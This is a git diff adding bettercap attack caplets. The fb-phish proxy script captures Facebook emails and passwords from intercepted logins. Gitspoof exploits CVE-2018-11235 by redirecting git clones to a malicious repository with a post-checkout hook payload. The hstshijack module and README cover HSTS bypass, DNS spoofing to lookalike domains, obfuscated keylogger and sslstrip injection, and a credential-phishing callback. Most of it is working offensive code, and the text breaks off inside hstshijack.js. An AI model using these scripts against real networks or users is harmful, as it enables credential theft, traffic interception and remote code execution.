console.log("\n No hosts to display.\n") + } +} + +function onCommand(cmd) { + if (cmd == "enumerate.hosts.all") { + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + printHosts(saved_hosts) + return true + } + + if (cmd == "enumerate.hosts.new") { + new_hosts = compareHosts( enumerated_hosts, extractHosts() ) + printHosts(new_hosts) + return true + } + + if ( cmd.match(/^enumerate\.hosts\.regexp ./) ) { + regexp = new RegExp( cmd.replace("enumerate.hosts.regexp ", "") ) + saved_hosts = readFile( env("enumerate.hosts.output") ).split("\n") + found_hosts = [] + + for (var i = 0; i < saved_hosts.length; i++) { + saved_hosts[i].match(regexp) ? found_hosts.push(saved_hosts[i]) : "" + } + + printHosts(found_hosts) + return true + } + + if (cmd == "enumerate.hosts.save") { + saveHosts( extractHosts() ) + return true + } +} + +function onLoad() { + console.log("\n" + bold + " Commands" + reset + "\n") + console.log(" " + yellow + "enumerate.hosts.all" + reset + " : Enumerate all hosts.") + console.log(" " + yellow + "enumerate.hosts.new" + reset + " : Enumerate new hosts.") + console.log(" " + yellow + "enumerate.hosts.regexp" + reset + " : Enumerate hosts with regexp value.\n") + configure() + log_info("(" + green + "enumerate.hosts" + reset + ") Module successfully loaded.") +} diff --git a/fb-phish/fb-phish.cap b/fb-phish/fb-phish.cap new file mode 100644 index 0000000..8ff3b31 --- /dev/null +++ b/fb-phish/fb-phish.cap @@ -0,0 +1,7 @@ +set http.server.address 0.0.0.0 +set http.server.path www/www.facebook.com/ + +set http.proxy.script fb-phish.js + +http.proxy on +http.server on diff --git a/fb-phish/fb-phish.js b/fb-phish/fb-phish.js new file mode 100644 index 0000000..cb1d57e --- /dev/null +++ b/fb-phish/fb-phish.js @@ -0,0 +1,28 @@ +var RESET = "\033[0m"; + +function R(s) { + return "\033[31m" + s + RESET; +} + +function B(s) { + return "\033[34m" + s + RESET; +} + +function onRequest(req, res) { + if( req.Method == "POST" && req.Path == "/login.php" && req.ContentType == "application/x-www-form-urlencoded" ) { + var form = req.ParseForm(); + var email = form["email"] || "?", + pass = form["pass"] || "?"; + + log( R(req.Client.IP), " > FACEBOOK > email:", B(email), " pass:'" + B(pass) + "'" ); + + headers = res.Headers.split("\r\n") + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, "") + res.RemoveHeader(header_name) + } + res.Status = 301; + res.SetHeader("Location", "https://www.facebook.com") + res.SetHeader("Connection", "close") + } +} diff --git a/gitspoof/README.md b/gitspoof/README.md new file mode 100644 index 0000000..030f316 --- /dev/null +++ b/gitspoof/README.md @@ -0,0 +1,58 @@ +# Caplet for exploiting CVE-2018-11235 + +This caplet is intercepting http/https git clone attempts and +redirecting them to local http server that serves a malicious +repository leading to exploitation of CVE-2018-11235 on vulnerable +client. + +## How to use + +1. Create a malicious repository with `build_repo.sh` script. The + script will take the contents of `payload.txt` as payload - + customize the payload file to your needs. +2. Run the caplet with: + +``` +bettercap -caplet caplets/gitspoof/gitspoof.cap +``` + +## Alternative use cases + +You can control to which repository redirect the victim, by changing +`gitspoof.repo` variable to an IP or domain (do not prefix with +http(s)). This way if the victim is not susceptible to CVE-2018-11235 +you can still try to inject arbitrary code into the repo - this might +come in handy when trying to exploit some bad CI/deployment scripts. + +## Limitations + +Obviously the script won't be able to intercept https git clones +unless you can obtain a valid SSL cert or the victim used `-c +http.sslVerify=false` configuration option. + +The script was aimed at attacking automated systems not people +therefore the repo layout doesn't try hard to look inconspicuous ;) + +Attacking human with this caplet would require to also spoof some +trusted domain and point it at bettercap server since Git will always +notify the user about http redirect. + +Finally - all the CVE-2018-11235 limitations apply - to get RCE the +victim needs to have vulnerable git client **and** do a recursive +git clone (or initialize the submodules afterwards). + +## POC testing + +You can test the script yourself without arp poison: + +1. Setup vulnerable git on your system +2. Fire the caplet (remember to run `./build_repo.sh` first!) +3. On vulnerable system run: + +``` +http_proxy= git clone --recursive http://github.com/bettercap/bettercap /tmp/exploit +``` + +(**NOTE**: we are intentionally trying to clone via http on github) + +The clone should trigger the default payload. diff --git a/gitspoof/build_repo.sh b/gitspoof/build_repo.sh new file mode 100755 index 0000000..302adf6 --- /dev/null +++ b/gitspoof/build_repo.sh @@ -0,0 +1,28 @@ +#!/bin/bash +evil_submodule="zemodule" +empty_submodule="https://github.com/pielgrzym/noop" + +rm -rf evil_git_repo + +git init evil_git_repo --bare +mv evil_git_repo/hooks/post-update.sample evil_git_repo/hooks/post-update +chmod a+x evil_git_repo/hooks/post-update + +temp_repo=$(mktemp -d) +git clone evil_git_repo $temp_repo +old_dir=$(pwd) +cd $temp_repo +export GIT_WORK_TREE=$temp_repo +mkdir -p fakegit/modules +git submodule add $empty_submodule $evil_submodule +git submodule add $empty_submodule error +mv .git/modules/$evil_submodule fakegit/modules/$evil_submodule +cp $old_dir/payload.txt fakegit/modules/$evil_submodule/hooks/post-checkout +chmod 755 fakegit/modules/$evil_submodule/hooks/post-checkout +git config -f .gitmodules --rename-section submodule.$evil_submodule submodule.../../fakegit/modules/$evil_submodule +sed -i 's/\.git/fakegit/' $evil_submodule/.git + +git add . +git commit -m 'Initial commit' +git push +rm -rf $temp_repo diff --git a/gitspoof/gitspoof.cap b/gitspoof/gitspoof.cap new file mode 100644 index 0000000..e80f06c --- /dev/null +++ b/gitspoof/gitspoof.cap @@ -0,0 +1,9 @@ +set http.server.path caplets/gitspoof/evil_git_repo +http.server on + +set http.proxy.script caplets/gitspoof/gitspoof.js +set https.proxy.script caplets/gitspoof/gitspoof.js +http.proxy on +https.proxy on + +# arp.spoof on diff --git a/gitspoof/gitspoof.js b/gitspoof/gitspoof.js new file mode 100644 index 0000000..1973e08 --- /dev/null +++ b/gitspoof/gitspoof.js @@ -0,0 +1,29 @@ +var gitspoof_repo = undefined; + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + bold = "\033[1;37m", + reset = "\033[0m" + +function onLoad() { + env["gitspoof.repo"] ? gitspoof_repo = env["gitspoof.repo"] : gitspoof_repo = env["iface.ipv4"]; + log( "Gitspoof loaded" ); + log(green +"Git redirect to repo: " + yellow + gitspoof_repo + "/" + reset); +} + +function onResponse(req, res) { + if (req.Query == 'service=git-upload-pack') { + log(bold + "Got git clone request, attempting redirect" + reset); + } + if (req.Query == 'service=git-upload-pack' && req.Hostname != gitspoof_repo) { + res.Status = 301; + headers = res.Headers.split("\r\n"); + for (var i = 0; i < headers.length; i++) { + header_name = headers[i].replace(/:.*/, ""); + res.RemoveHeader(header_name); + } + res.SetHeader("Location", "http://" + gitspoof_repo + "/info/refs?service=git-upload-pack"); + res.Body = ""; + } +} diff --git a/gitspoof/payload.txt b/gitspoof/payload.txt new file mode 100644 index 0000000..fbd21f2 --- /dev/null +++ b/gitspoof/payload.txt @@ -0,0 +1,9 @@ +#!/bin/sh + +echo "pwned with" +echo " ____ _____ _____ _____ _____ ____ ____ _ ____ " +echo "| __ )| ____|_ _|_ _| ____| _ \ / ___| / \ | _ \ " +echo "| _ \| _| | | | | | _| | |_) | | / _ \ | |_) |" +echo "| |_) | |___ | | | | | |___| _ <| |___ / ___ \| __/ " +echo "|____/|_____| |_| |_| |_____|_| \_\\____/_/ \_\_| " + diff --git a/gps.cap b/gps.cap new file mode 100644 index 0000000..7bb8342 --- /dev/null +++ b/gps.cap @@ -0,0 +1,4 @@ +gps on + +# https://www.waveshare.com/wiki/GSM/GPRS/GNSS_HAT +!echo "AT+CGNSPWR=1\nAT+CGNSTST=1" > /dev/ttyUSB0 diff --git a/hstshijack/README.md b/hstshijack/README.md new file mode 100644 index 0000000..5c926f4 --- /dev/null +++ b/hstshijack/README.md @@ -0,0 +1,161 @@ +

+ +

+ +### Caplet + +```sh +# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + +# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads' +# variables get precendence over those assigned to the 'hstshijack.ignore' variable. +set hstshijack.targets *.google.com, google.com, gstatic.com, *.gstatic.com +set hstshijack.replacements *.google.corn,google.corn,gstatic.corn,*.gstatic.corn +set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt +set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json +set hstshijack.ssl.check true +#set hstshijack.blockscripts example.com,*.example.com +set hstshijack.obfuscate true +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js +#set hstshijack.ignore * + +set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js +http.proxy on + +set dns.spoof.domains *.google.corn,google.corn,gstatic.corn,*.gstatic.corn +set dns.spoof.all true +dns.spoof on +``` + +### **hijack.js** payload + +This module injects files with a JavaScript payload (**hijack.js**) which acts as a callback for bettercap, and takes care of hostname spoofing in attributes of injected documents, as well as XMLHttpRequest. + +Injecting **hijack.js** is essential for hostname spoofing. + +### Scalable domain indexing (SSL log) + +
+ +

+ +

+ +When hosts respond with an HTTPS redirect, bettercap will save their hostnames in a list and keep track of the index ranges of these hostnames sorted by each character's Unicode code point value, allowing the list to scale by reducing a considerable amount of overhead for the proxy module. + +By default, this caplet will remap the index ranges on launch of all the domains that were found in the file that you assigned to the `hstshijack.ssl.domains` variable (to ensure that it is still in the right format). You can skip this by setting the `hstshijack.ssl.check` variable value to `false`. + +Bettercap will also send a HEAD request to unknown hosts that were discovered in the injected document and retrieved via a callback from the **hijack.js** payload. This is done to learn what hosts use HTTPS, ahead of time. + +Hostnames that you target with the `hstshijack.targets` variable are automatically logged and indexed. + +### Hostname spoofing + +In the **caplet file** you can assign comma separated domains to the `hstshijack.targets` variable. _(wildcard allowed)_ + +For every targeted hostname you must specify a replacement hostname, like this: + +```sh +set hstshijack.targets google.com, *.google.com +set hstshijack.replacements google.corn,*.google.corn +``` + +You can try to make them as unnoticeable as you can, but your options are limited here in terms of evading HSTS. + +### Block scripts + +In the **caplet file** you can block JavaScript from hosts by assigning them to the `hstshijack.blockscripts` variable. _(wildcard allowed)_ + +### Custom payloads + +You can also inject your own scripts into files from your specified hosts by assigning them to the `hstshijack.payloads` variable. + +Custom payloads are (optionally) obfuscated at launch, executed synchronously, and wrapped inside a function that is defined as a property of the current JavaScript context (globalThis). This is done to ensure that your payload is only executed once per application, even if injected multiple times. Individual payloads are not failsafe, so you must set your conditions/try and catch blocks yourself. + +Example: + +```sh +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js +``` + +You should always inject the **hijack.js** payload when spoofing hostnames. + +### Obfuscation + +You can write custom payloads that are automatically obfuscated by the module. + +Basically, every word that was found beginning with `obf_` will be obfuscated. + +Example: + +```js +function obf_function() { + alert("Random variable: obf_whatever_follows") +} + +obf_function() +``` + +Will be injected as: + +```js +function jfIleNwmKoa() { + alert("Random variable: AsjZnJWklwMNqshCaloE") +} + +jfIleNwmKoa() +``` + +### Silent callbacks + +You can have your payloads send callbacks to your machine that bettercap will print, but not proxy. + +Example of a silent callback: + +```js +form.onsubmit = function() { + req = new XMLHttpRequest() + req.open("POST", "http://" + location.host + "/obf_path_callback?username=" + username + "&password=" + password) + req.send() +} +``` + +The following POST request will be sniffed by bettercap, but not proxied (the request will be dropped). + +Any instance of `obf_path_callback` will be replaced with the callback path (see example above). + +### Whitelisting callbacks + +You can automatically terminate an attack between specific clients and hosts by making the client's machine initiate a whitelisting callback. + +Example of multiple whitelisting callbacks: + +```js +// Whitelist multiple hosts to ensure the intended resources will load. + +form.onsubmit = function() { + // Whitelist current hostname and phish credentials + req = new XMLHttpRequest() + req.open("POST", "http://" + location.hostname + "/obf_path_whitelist?email=" + email + "&password=" + password) + req.send() + + // Whitelist facebook + req = new XMLHttpRequest() + req.open("POST", "http://facedook.com/obf_path_whitelist") + req.send() + + // Whitelist facebook CDN + req = new XMLHttpRequest() + req.open("POST", "http://static.xx.fdcdn.net/obf_path_whitelist") + req.send() + + // Whitelist redirect to facebook + req = new XMLHttpRequest() + req.open("POST", "http://fd.com/obf_path_whitelist") + req.send() +} +``` + +When a request is sent as above, bettercap will stop spoofing connections between the sender and the requested host. + +If any resource from a spoofed host is requested that was previously whitelisted for that client, then that client will be redirected to the intended (unspoofed) host. diff --git a/hstshijack/domains.txt b/hstshijack/domains.txt new file mode 100644 index 0000000..e69de29 diff --git a/hstshijack/hstshijack.cap b/hstshijack/hstshijack.cap new file mode 100644 index 0000000..93b4b8d --- /dev/null +++ b/hstshijack/hstshijack.cap @@ -0,0 +1,21 @@ +# Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + +# Domains assigned to 'hstshijack.targets', 'hstshijack.blockscripts' and 'hstshijack.payloads' +# variables get precendence over those assigned to the 'hstshijack.ignore' variable. +set hstshijack.targets google.com, *.google.com, gstatic.com, *.gstatic.com +set hstshijack.replacements google.corn,*.google.corn,gstatic.corn,*.gstatic.corn +set hstshijack.ssl.domains /usr/local/share/bettercap/caplets/hstshijack/domains.txt +set hstshijack.ssl.index /usr/local/share/bettercap/caplets/hstshijack/index.json +set hstshijack.ssl.check true +#set hstshijack.blockscripts example.com,*.example.com +set hstshijack.obfuscate true +set hstshijack.payloads *:/usr/local/share/bettercap/caplets/hstshijack/payloads/hijack.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js,*.google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js,google.com:/usr/local/share/bettercap/caplets/hstshijack/payloads/google-search.js +set hstshijack.ignore captive.apple.com,connectivitycheck.gstatic.com,detectportal.firefox.com,www.msftconnecttest.com + +set http.proxy.script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js +http.proxy on + +set dns.spoof.domains google.corn,*.google.corn,gstatic.corn,*.gstatic.corn +set dns.spoof.all true +dns.spoof on + diff --git a/hstshijack/hstshijack.js b/hstshijack/hstshijack.js new file mode 100644 index 0000000..cc3e505 --- /dev/null +++ b/hstshijack/hstshijack.js @@ -0,0 +1,1053 @@ +/* + * Documentation can be found at https://github.com/bettercap/caplets/tree/master/hstshijack + */ + +var ssl = { + "domains": [], + "index": {}, + "hierarchy": "-.0123456789abcdefghijklmnopqrstuvwxyz" +}; + +var payload, + payload_container_prefix = ( + "if (!globalThis.{{SESSION_ID_TAG}}) {\n" + + "globalThis.{{SESSION_ID_TAG}} = function() {\n"), + payload_container_suffix = ( + "\n}\n" + + "globalThis.{{SESSION_ID_TAG}}();\n" + + "}\n"); + +var ignore_hosts = [], + target_hosts = [], + replacement_hosts = [], + block_script_hosts = []; + +var payloads = {}, + obfuscate; + +var callback_path, + whitelist_path, + ssl_index_path, + session_id, + varname_target_hosts, + varname_replacement_hosts; + +var math_seed; + +var whitelist = {}; + +var selector_header = /^\s*(.*?)\s*:\s*(.*?)\s*$/, + selector_header_csp = /content-security-policy:.*?\r\n/ig, + selector_header_set_cookie = /^set-cookie$/i, + selector_header_set_cookie_secure_samesite = /^(?:secure$|samesite=)/i, + selector_content_type_html = /text[/](?:html|xml)|application[/](?:hta|xhtml[+]xml|xml)/i, + selector_extension_html = /[.](?:html|htm|xml|xhtml|xhtm|xht|hta)$/i, + selector_meta_tag_csp = / http-equiv=['"]?Content-Security-Policy['"]?([ />])/ig, + selector_strip_whitespace = /^\s*(.*?)\s*$/, + selector_uri_one = /^https:\/\//i, + selector_uri_two = /https:\/\/([^:/?#]*).*/i, + selector_content_type_js = /\S+[/]javascript/i, + selector_html_magic = /^\s*)/ig, + selector_html_script_close_tag = /<\/script(\s|>)/ig, + selector_all_dashes = /\-/g, + selector_all_dots = /\./g, + selector_scheme_http_https_colon = /(http)s:/ig, + selector_port_https = /:443($|[^0-9])/g, + selector_regset_wildcard_one = /^\*\./, + selector_regset_wildcard_two = /\.\*$/, + selector_regset_wildcard_three = /\.\*$/g, + selector_regset_wildcard_four = /\.\*/g, + selector_query_param = /(^[^=]*)=(.*$)/; + +var red = "\033[31m", + yellow = "\033[33m", + green = "\033[32m", + blue = "\033[34m", + on_white = "\033[47;30m", + on_grey = "\033[40;37m", + on_blue = "\033[104;30m", + bold = "\033[1;37m", + reset = "\033[0m"; + +function randomFloat() { + r = Math.sin(math_seed++) * 10000; + return r - Math.floor(r); +} + +function randomString(length) { + length = parseInt(length); + var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", + buff = new Array(length); + for (var a = 0; a < buff.length; a++) { + index = parseInt(Math.random() * chars.length); + buff[a] = chars.charAt(index) + } + return buff.join(""); +} + +function toRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dots, "\\."); + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + return [ + new RegExp("(^|[^a-z0-9-.])" + selector_string + "($|[^a-z0-9-.])", "ig"), + "$1" + replacement_string + "$2" + ]; +} + +function toWholeRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dots, "\\."); + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + return [ + new RegExp("^" + selector_string + "$", "ig"), + replacement_string + ]; +} + +function toWildcardRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + if (selector_string.match(selector_regset_wildcard_one)) { + selector_string = selector_string.replace(selector_regset_wildcard_one, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_one, ""); + return [ + new RegExp(selector_string, "ig"), + "$1" + replacement_string + ]; + } else if (selector_string.match(selector_regset_wildcard_two)) { + selector_string = selector_string.replace(selector_regset_wildcard_three, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_two, ""); + return [ + new RegExp(selector_string, "ig"), + replacement_string + "$1" + ]; + } else { + log_error(on_blue + "hstshijack" + reset + " Invalid toWildcardRegexp() value (got " + selector_string + ")."); + } +} + +function toWholeWildcardRegexp(selector_string, replacement_string) { + selector_string = selector_string.replace(selector_all_dashes, "\\-"); + if (selector_string.match(selector_regset_wildcard_one)) { + selector_string = selector_string.replace(selector_regset_wildcard_one, "((?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?.)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_one, ""); + return [ + new RegExp("^" + selector_string + "$", "ig"), + "$1" + replacement_string + ]; + } else if (selector_string.match(selector_regset_wildcard_two)) { + selector_string = selector_string.replace(selector_regset_wildcard_four, "((?:.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+)"); + selector_string = selector_string.replace(selector_all_dots, "\\."); + replacement_string = replacement_string.replace(selector_regset_wildcard_two, ""); + return [ + new RegExp(selector_string, "ig"), + replacement_string + "$1" + ]; + } else { + log_error(on_blue + "hstshijack" + reset + " Invalid toWholeWildcardRegexp() value (got " + selector_string + ")."); + } +} + +/* Matches /(^|[^a-z0-9-.])example\.com($|[^a-z0-9-.])/ig */ +function toRegexpSet(selector_string, replacement_string) { + if (selector_string.indexOf("*") !== -1) { + return toWildcardRegexp(selector_string, replacement_string); + } else { + return toRegexp(selector_string, replacement_string); + } +} + +/* Matches ^example.com$ */ +function toWholeRegexpSet(selector_string, replacement_string) { + if (selector_string.indexOf("*") !== -1) { + return toWholeWildcardRegexp(selector_string, replacement_string); + } else { + return toWholeRegexp(selector_string, replacement_string); + } +} + +/* Saves the list of domains using SSL, as well as its index ranges. */ +function saveSSLIndex() { + writeFile(env["hstshijack.ssl.domains"], ssl.domains.join("\n")); + writeFile(env["hstshijack.ssl.index"], JSON.stringify(ssl.index, null, 2)); +} + +/* Returns the amount of characters of an identical prefix of two given strings. */ +function getMatchingPrefixLength(string1, string2) { + count = 0; + if (string1.length > string2.length) { + for (a = 0; a < string2.length; a++) { + if (string1.charAt(a) !== string2.charAt(a)) { + break; + } + count++; + } + } else { + for (a = 0; a < string1.length; a++) { + if (string1.charAt(a) !== string2.charAt(a)) { + break; + } + count++; + } + } + return count; +} + +/* Returns true if domain1 gets alphanumeric precendence over domain2. */ +function getsPrecedence(domain1, domain2) { + if (domain1.length > domain2.length) { + /* If the first given domain is longer than the second. */ + for (a = 0; a < domain2.length; a++) { + rank1 = ssl.hierarchy.indexOf(domain1.charAt(a)); + rank2 = ssl.hierarchy.indexOf(domain2.charAt(a)); + if (rank1 > rank2) { + return false; + } else if (rank1 < rank2) { + return true; + } + } + return false; + } else { + /* If the second given domain is longer than the first. */ + for (a = 0; a < domain1.length; a++) { + rank1 = ssl.hierarchy.indexOf(domain1.charAt(a)); + rank2 = ssl.hierarchy.indexOf(domain2.charAt(a)); + if (rank1 > rank2) { + return false; + } else if (rank1 < rank2) { + return true; + } + } + return true; + } +} + +/* Returns an array with the first and last index of an alphanumeric range of domains. + * This is the range in which domains are/will be indexed. */ +function getIndexRange(char) { + if (index_range = ssl.index[char]) { + /* Character is already indexed. */ + return index_range; + } else { + /* Character is not yet indexed. */ + indexed_chars = Object.keys(ssl.index).concat(char).sort(); + this_char_index = indexed_chars.indexOf(char); + if ( + indexed_chars[this_char_index - 1] + && indexed_chars[this_char_index + 1] + ) { + /* Will not be the first nor last indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index + 1]][0], + ssl.index[indexed_chars[this_char_index + 1]][0] + ]; + } else if (indexed_chars[this_char_index + 1]) { + /* Will be the first indexed character, but not the last. */ + return [ + 0, + ssl.index[indexed_chars[this_char_index + 1]][0] + ]; + } else if (indexed_chars[this_char_index - 1]) { + /* Will be the last indexed character, but not the first. */ + if (ssl.domains.length === 1) { + /* Will be the second and last indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index - 1]][1] + 1, + 1 + ]; + } else { + /* Will be the last but not the second indexed character. */ + return [ + ssl.index[indexed_chars[this_char_index - 1]][1] + 1, + ssl.domains.length + ]; + } + } else { + /* Will be the first and last indexed character. */ + return [0, 0]; + } + } +} + +/* Returns the index of a given domain within a given index range. */ +function getDomainIndex(domain, index_range) { + domain = domain.toLowerCase(); + if ( + index_range[0] === index_range[1] + && domain === ssl.domains[index_range[0]] + ) { + /* This domain is the only indexed domain with this first character. */ + return index_range[0]; + } + /* Return this domain's index when found in this index range. */ + for (a = index_range[0]; a < index_range[1] + 1; a++) { + if (domain === ssl.domains[a]) { + return a; + } + } + /* This domain is not indexed. */ + return -1; +} + +/* Index a new domain. */ +function indexDomain(domain) { + domain = domain.toLowerCase(); + first_char = domain.charAt(0); + index_range = getIndexRange(first_char); + if (getDomainIndex(domain, index_range) === -1) { + /* This domain is not indexed yet. */ + log_debug(on_blue + "hstshijack" + reset + " Indexing domain " + bold + domain + reset + " ..."); + indexed_chars = Object.keys(ssl.index); + if (index_range[0] === index_range[1]) { + /* This index range consists of only one index. */ + if (ssl.domains[index_range[0]]) { + /* This index range contains one domain. */ + new_index = index_range[0]; + if (getsPrecedence(ssl.domains[index_range[0]], domain)) { + new_index++; + } + arr_ = ssl.domains.slice(0, new_index); + _arr = ssl.domains.slice(new_index, ssl.domains.length); + ssl.domains = [].concat(arr_, [domain], _arr); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + 1 + ]; + } else { + /* This index range contains no domains. */ + ssl.domains.push(domain); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + ]; + } + } else { + /* This index range consists of multiple domains. */ + new_index = index_range[0]; + for (var a = index_range[0]; a < index_range[1] + 1; a++) { + if (!getsPrecedence(domain, ssl.domains[a])) { + new_index = a + 1; + } else { + break; + } + } + arr_ = ssl.domains.slice(0, new_index); + _arr = ssl.domains.slice(new_index, ssl.domains.length); + ssl.domains = [].concat(arr_, [domain], _arr); + ssl.index[first_char] = [ + index_range[0], + index_range[1] + 1 + ]; + } + remaining_indexed_chars = indexed_chars.slice(index_range[1] + 1); + for (a = 0; a < remaining_indexed_chars.length; a++) { + indexed_char = remaining_indexed_chars[a]; + index_range = ssl.index[indexed_char]; + ssl.index[indexed_char] = [ + index_range[0] + 1, + index_range[1] + 1 + ]; + } + saveSSLIndex(); + } else { + /* This domain is already indexed. */ + log_debug(on_blue + "hstshijack" + reset + " Skipped already indexed domain " + bold + domain + reset); + } +} + +function configure() { + /* Read caplet. */ + env["hstshijack.ignore"] + ? ignore_hosts = env["hstshijack.ignore"].replace(/\s/g, "").split(",") + : ignore_hosts = []; + env["hstshijack.targets"] + ? target_hosts = env["hstshijack.targets"].replace(/\s/g, "").split(",") + : target_hosts = []; + env["hstshijack.replacements"] + ? replacement_hosts = env["hstshijack.replacements"].replace(/\s/g, "").split(",") + : replacement_hosts = []; + env["hstshijack.blockscripts"] + ? block_script_hosts = env["hstshijack.blockscripts"].replace(/\s/g, "").split(",") + : block_script_hosts = []; + env["hstshijack.obfuscate"] + ? obfuscate = env["hstshijack.obfuscate"].replace(/\s/g, "").toLowerCase() + : obfuscate = false; + + /* Validate caplet. */ + if (target_hosts.length < replacement_hosts.length) { + log_fatal(on_blue + "hstshijack" + reset + " Too many hstshijack.replacements (got " + replacement_hosts.length + ")."); + } + if (target_hosts.length > replacement_hosts.length) { + log_fatal(on_blue + "hstshijack" + reset + " Not enough hstshijack.replacements (got " + replacement_hosts.length + ")."); + } + if (target_hosts.indexOf("*") !== -1) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets value (got *)."); + } + if (replacement_hosts.indexOf("*") !== -1) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.replacements value (got *)."); + } + + whole_prefix_wildcard_domain_selector = /^(?:\*\.[a-z]{1,63}|(?:(?:\*\.|)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63})))$/i; + whole_suffix_wildcard_domain_selector = /^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+\*$/i; + for (a = 0; a < ignore_hosts.length; a++) { + if ( + !ignore_hosts[a].match(/^\*$/i) + && !ignore_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !ignore_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.ignore value (got " + ignore_hosts[a] + ")."); + } + } + + for (a = 0; a < target_hosts.length; a++) { + if ( + !target_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !target_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets value (got " + target_hosts[a] + ")."); + } + + if ( + !replacement_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !replacement_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.replacements value (got " + replacement_hosts[a] + ")."); + } + + if (target_hosts[a].match(/\*/g) || replacement_hosts[a].match(/\*/g)) { + target_host_wildcard_count = target_hosts[a].match(/\*/g).length || 0; + replacement_host_wildcard_count = replacement_hosts[a].match(/\*/g).length || 0; + if (target_host_wildcard_count !== replacement_host_wildcard_count) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.targets or hstshijack.replacements value, wildcards do not match (got " + target_hosts[a] + " and " + replacement_hosts[a] + ")."); + } + } + } + + for (a = 0; a < block_script_hosts.length; a++) { + if ( + !block_script_hosts[a].match(/^\*$/i) + && !block_script_hosts[a].match(whole_prefix_wildcard_domain_selector) + && !block_script_hosts[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.blockscripts value (got " + block_script_hosts[a] + ")."); + } + } + + if (obfuscate === "true") { + obfuscate = true; + } else { + obfuscate = false; + } + + /* Prepare payloads. */ + env["hstshijack.payloads"] + ? payload_entries = env["hstshijack.payloads"].replace(/\s/g, "").split(",") + : payload_entries = []; + + for (a = 0; a < payload_entries.length; a++) { + if ( + !payload_entries[a].match(/^\*:.+$/i) + && !payload_entries[a].match(/^(?:\*\.[a-z]{1,63}|(?:(?:\*\.|)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+(?:[a-z]{1,63}))):.+$/i) + && !payload_entries[a].match(whole_suffix_wildcard_domain_selector) + ) { + log_fatal(on_blue + "hstshijack" + reset + " Invalid hstshijack.payloads value (got " + payload_entries[a] + ")."); + } + + payload_host = payload_entries[a].replace(/[:].*/, ""); + payload_path = payload_entries[a].replace(/.*[:]/, ""); + + payload = ""; + if (!(payload = readFile(payload_path))) { + log_fatal(on_blue + "hstshijack" + reset + " Could not read a payload (got " + payload_path + ")."); + } else { + payload = payload + .replace(/obf_var_target_hosts/g, varname_target_hosts) + .replace(/obf_var_replacement_hosts/g, varname_replacement_hosts) + .replace(/obf_path_callback/g, callback_path) + .replace(/obf_path_ssl_index/g, ssl_index_path) + .replace(/obf_path_whitelist/g, whitelist_path); + + if (obfuscate) { + obfuscation_variables = payload.match(/obf_[a-z0-9_]*/ig) || []; + for (b = 0; b < obfuscation_variables.length; b++) { + if (obfuscation_variables.indexOf(obfuscation_variables[b]) === b) { + regexp = new RegExp(obfuscation_variables[b], "g"); + payload = payload.replace(regexp, randomString(8 + (Math.random() * 8))); + } + } + } + + if (payloads[payload_host]) { + payloads[payload_host] = payloads[payload_host] + "\n" + payload + "\n"; + } else { + payloads[payload_host] = payload + "\n"; + } + } + } + + /* Prepare payload container */ + 